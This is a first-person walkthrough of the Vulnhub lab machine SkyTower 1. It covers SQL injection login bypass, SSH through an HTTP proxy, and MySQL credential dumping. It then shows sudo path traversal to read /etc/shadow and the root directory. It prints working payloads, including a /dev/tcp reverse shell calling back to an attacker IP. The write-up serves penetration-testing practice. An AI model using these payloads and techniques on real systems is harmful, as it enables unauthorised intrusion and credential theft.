Overall Summary
SkyTower 1 is a machine from Vulnhub to practice SQL injection to bypass a login page and to get familiar using a proxy. When getting a low privilege shell there are some restrictions that need to be bypassed to get a working shell. Privilege escalation consists in interacting with MySQL locally to get a shell as a different user from the machine and from there abuse sudo permissions to get a root shell.
Scanning and Enumeration
A full nmap TCP scan with NSE scripts shows 2 open ports and 1 filtered.
From the nmap scan we can see that there is an ssh service that is being filtered, a web service running on port 80, and an HTTP proxy service running on port 3128, I’ll first check the web service on port 80. Browsing to the web service displays a login page.
Trying a common SQL injection to bypass the login page displays an error but confirms that SQL injection is possible. This is the injection I used:
test' or 1=1 -- -
MySQL is running on the target machine but it seems like it’s filtering out some characters that I’m using. I’ll try to replace the “OR” operator with “||” to see what it does (the operators mean the same thing). Doing it still returns an error but this time it seems a little different.
We now don’t see the number 1, which means it got past that point but failed somewhere after that, and that seems to be where I placed the dashes. I’ll instead try to terminate the query using the SQL method learn during the OSCP course, this is how the injection will look like:
test' or 1=1 LIMIT 1;#I was able to successfully bypass the login page and it displayed some credentials to ssh.
Exploitation
I remembered that the SSH service was filtered, and I also remembered that there is an HTTP proxy server running on port 3128. I’ll add the HTTP proxy to my proxychains.conf file to use SSH with proxychains.
I’ll then attempt to SSH in with the credentials I found using proxychains.
When trying to SSH in it seems like the credentials to work, but the connections is being dropped. I’ll try run a command using SSH to see if I can try to do a reverse shell instead. I was successfully able to execute the command “id” as shown in the screenshot.
I’ll use the following command to get a reverse shell, the command should be enclosed with quotes (this is a common Linux reverse shell):
0<&196;exec 196<>/dev/tcp/192.168.56.103/443; sh <&196 >&196 2>&196After executing the reverse shell command through SSH, I set up a netcat listener on port 443 and was able to successfully receive a reverse shell.
I later found out that the reverse shell was not necessary as a shell could have been spawn by just issuing the command “/bin/sh” while trying to SSH in.
Post-Exploitation
After looking for sudo permissions, SUID binaries, cronjobs, etc I couldn’t find anything standing out right away. I uploaded LinEnum.sh to the target machine and it was able to tell me that I could connect to MySQL using the default credentials root/root. This is something I should have definitely test out before using LinEnum.
At this point my problem was to spawn a TTY shell to better interact with MySQL but I couldn’t find a way to upgrade to a TTY shell. The other option was now to execute the queries from a single command for example, to list the databases I’ll use the following command:
mysql -u root -p -e "show databases"
Now that I know the entries for the databases I’ll now issue a command to use the most obvious database “SkyTech” and list its contents, this is the command I’ll use:
mysql -u root -p -e "use SkyTech; show tables"
There was only on table and looking at the contents of the table will show some passwords for the other user accounts on the machine.
mysql -u root -p -e "use SkyTech; select * from login"
With those credentials I’ll try first to SSH in as the sara user. Just like the user john the sessions dies immediately, so I’ll issue the command “/bin/sh” to get a shell.
As I always do first when having a shell, I checked for sudo permissions using the “sudo -l” command and sara did have some sudo permissions when using cat and ls.
It seems like I would be able to cat and list files from the /accounts folder which is actually empty and not really be able to execute anything with it, the commands are also using full paths so that’s also out of the question. The insecure part of these sudo permissions is that it has the ” * ” symbol at the end which means that anything from there can be used, so I’ll simply try to do path traversal and see if I can see the contents of the shadow file, this is the command I will use:
sudo /bin/cat /accounts/../../etc/shadow
I was able to successfully get the contents of the file so I tried to crack the password using john the ripper but it was taking too much time and it just didn’t seem like the right way to do it. Since I can do path traversal and I can also use the ls command as sudo, I’ll check for the contents inside the root directory with the following command:
sudo /bin/ls /accounts/../../root/There was only the flag.txt file inside the directory and looking at the contents of the file reveals the password for the root account.
I was then able to SSH as the root user with the password found.
